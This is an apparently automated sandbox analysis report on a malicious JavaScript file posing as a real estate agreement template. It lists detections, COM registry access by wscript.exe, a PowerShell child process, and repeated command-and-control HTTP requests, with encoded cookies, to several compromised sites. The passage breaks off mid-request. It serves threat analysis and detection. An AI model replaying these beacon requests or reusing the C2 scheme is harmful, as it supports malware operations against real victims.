Windows Analysis Report
real estate co ownership agreement template 43632.js

AV Detection

Source: https://weissenbach-pr.de/xmlrpc.php

Avira URL Cloud: Label: malware

Source: weissenbach-pr.de	Virustotal: Detection: 10%			Perma Link
Source: https://weissenbach-pr.de/xmlrpc.php	Virustotal: Detection: 10%			Perma Link

Compliance

Source: unknown	HTTPS traffic detected: 91.198.66.211:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.3.78:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.28.10.122:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49711 version: TLS 1.2

Spreading

Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs			Jump to behavior

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g+sY1qlsVaFrs8IDI2axK4daJHy8TNkUx5yke8udy6InO3aaDF8cOvhEyUm02G4ZiAdW9oAi+gVB48hmb6VzOydy8z+4ZOBJzlk4GQGDLHnOc/2vYNknLSrRQUeeXnZoScGEbvaVXgW3Knygnxb5YdhsB3sNNqtwdOkFMIHsFzBuWROMFqJvCiaQrQe3hg3WQ0td9eCKBkBntVCP6xH9v8EsTmR+JajdgMI62PNJYToZFZ+1FkFYSqfBGwhdH9bkbnL6nqRCFq3gWfcB5pinp+JFv/1XZbUHO78M4x2vFst/rBBT9yAw3EtfLGhjtr3dct6qfbFe3FU4O2R57pUal78L2idKCefAQAA; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: naturalanimals.netConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm8TsZPNttDHKsngyDE9u9XdGqLup41gdU9wTPtIo+pzM/Mc/j8qio+He7y0w843NGKPzDaSSvwNCyFLxjrZH1f16yXgN8y1dUv9/VpJo0BAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: weissenbach-pr.deConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm8TsZPNttDHKsngyDE9u9XdGqLup41gdU9wTPtIo+pzM/Mc/j8qio+He7y0w843NGKPzDaSSvwNCyFLxjrZH1f16yXgN8y1dUv9/VpJo0BAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: memar98.comConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close
Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g+sY1qlsVaFrs8IDI2axK4daJHy8TNkUx5yke8udy6InO3aaDF8cOvhEyUm02G4ZiAdW9oAi+gVB48hmb6VzOydy8z+4ZOBJzlk4GQGDLHnOc/2vYNknLSrRQUeeXnZoScGEbvaVXgW3Knygnxb5YdhsB3sNNqtwdOkFMIHsFzBuWROMFqJvCiaQrQe3hg3WQ0td9eCKBkBntVCP6xH9v8EsTmR+JajdgMI62PNJYToZFZ+1FkFYSqfBGwhdH9bkbnL6nqRCFq3gWfcB5pinp+JFv/1XZbUHO78M4x2vFst/rBBT9yAw3EtfLGhjtr3dct6qfbFe3FU4O2R57pUal78L2idKCefAQAA; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 